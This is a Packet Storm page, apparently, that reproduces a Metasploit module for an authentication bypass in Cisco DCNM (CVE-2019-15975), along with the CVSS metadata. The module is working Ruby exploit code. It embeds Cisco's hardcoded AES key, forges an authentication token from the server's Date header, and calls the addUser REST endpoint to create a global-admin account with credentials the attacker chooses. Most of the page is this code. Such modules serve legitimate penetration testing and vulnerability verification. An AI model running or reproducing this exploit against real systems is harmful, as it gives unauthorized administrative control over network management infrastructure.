Lucene search

Mr_me, Yann Castel, metasploit.comPACKETSTORM:180759

HistoryAug 31, 2024 - 12:00 a.m.

Cisco DCNM Auth Bypass

2024-08-3100:00:00

mr_me, Yann Castel, metasploit.com

packetstormsecurity.com

metasploit

cisco dcnm

cve-2019-15975

edb-48018

session stealing

admin account

credentials

web interface

encryption

authentication bypass

recent connection

stability

reliability

side effects

ssl

retries

target uri

username

password

vulnerability

exploit

check code

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'securerandom'  
require 'base64'  
  
class MetasploitModule < Msf::Auxiliary  
  
include Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Cisco DCNM auth bypass',  
'Description' => %q{  
This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.  
After that, you can login to the web interface with those credentials.  
The only necessary condition is the more or less recent connection of an admin as this exploit  
uses a kind of session stealing.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'MR_ME', # Amazing POC on www.exploit-db.com  
'Yann Castel (yann.castel[at]orange.com)' # Metasploit module  
],  
'References' => [  
[ 'CVE', '2019-15975'],  
[ 'EDB', '48018']  
],  
'DisclosureDate' => '2020-06-01',  
'DefaultOptions' => { 'SSL' => true },  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]  
}  
)  
)  
  
register_options([  
Opt::RPORT(443),  
OptInt.new('RETRIES', [true, 'Retry count for the attack', 50]),  
OptString.new('TARGETURI', [true, 'The base path of the Cisco DCNM', '/']),  
OptString.new('USERNAME', [true, 'The username of the admin account you want to add', Faker::Internet.username(specifier: 8..10).gsub(/[^a-zA-Z0-9]/, '')]),  
OptString.new('PASSWORD', [true, 'The password of the admin account you want to add', Faker::Internet.password(min_length: 8, max_length: 10)])  
])  
end  
  
KEY = 's91zEQmb305F!90a'.freeze  
  
class AESCipher  
def initialize  
# Cisco's hardcoded key  
@bs = 16  
end  
  
def encrypt(raw)  
raw = _pad(raw)  
iv = "\x00" * 0x10  
cipher = OpenSSL::Cipher.new('aes-128-cbc')  
cipher.encrypt  
cipher.key = KEY  
cipher.iv = iv  
Base64.encode64(cipher.update(raw))  
end  
  
private  
  
def _pad(size)  
size + (@bs - size.length % @bs).chr.to_s * (@bs - size.length % @bs)  
end  
end  
  
def make_raw_token  
key = 'what_a_nice_key'  
uuid = SecureRandom.uuid.gsub('-', '')[0..20]  
time = leak_time  
raw_token = format('%<key>s-%<uuid>s-%<time>s', key: key, uuid: uuid, time: time)  
raw_token  
end  
  
def bypass_auth(token, usr, pwd)  
d = {  
'userName' => usr,  
'password' => pwd,  
'roleName' => 'global-admin'  
}  
h = { 'afw-token' => token }  
  
r = send_request_cgi({  
'method' => 'POST',  
'headers' => h,  
'vars_post' => d,  
'uri' => normalize_uri(target_uri.path, 'fm/fmrest/dbadmin/addUser')  
})  
  
if r && r.body != 'Access denied'  
  
json = r.get_json_document  
  
case json&.dig('resultMessage')  
when 'Success'  
return :success  
when 'User already exists.'  
return :user_already_exists  
when 'Cannot add user since password strength check failed'  
return :weak_password  
end  
else  
return :failed_to_connect  
end  
:fail  
end  
  
def leak_time  
r = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path)  
})  
  
fail_with(Failure::Unreachable, "Target #{rhost} could not be reached.") unless r  
  
r_time = DateTime.strptime(r.headers['Date'][0..-4], '%a, %d %b %Y %H:%M:%S').strftime('%s')  
r_time  
end  
  
def add_admin_account(usr, pwd)  
res = -1  
  
datastore['RETRIES'].times do  
raw = make_raw_token  
  
cryptor = AESCipher.new  
token = cryptor.encrypt(raw).gsub("\n", '')  
res = bypass_auth(token, usr, pwd)  
if res != :fail && res != :failed_to_connect  
  
return res  
end  
end  
print_error("Didn't succeed after #{datastore['RETRIES']} attempts")  
res  
end  
  
def check  
res = add_admin_account('test', 'test')  
  
if res == :success || res == :user_already_exists || res == :weak_password  
Exploit::CheckCode::Vulnerable  
elsif res == :failed_to_connect  
Exploit::CheckCode::Safe  
else  
Exploit::CheckCode::Unknown  
end  
end  
  
def run  
res = add_admin_account(datastore['USERNAME'], datastore['PASSWORD'])  
if res == :success  
print_good("Admin account with username: '#{datastore['USERNAME']}' and password: '#{datastore['PASSWORD']}' added!")  
elsif res == :weak_password  
print_error('Unable to add admin account due to bad password strength')  
elsif res == :user_already_exists  
print_error('Unable to add admin account because this username already exists')  
else  
print_error('Something went wrong')  
end  
end  
end  
`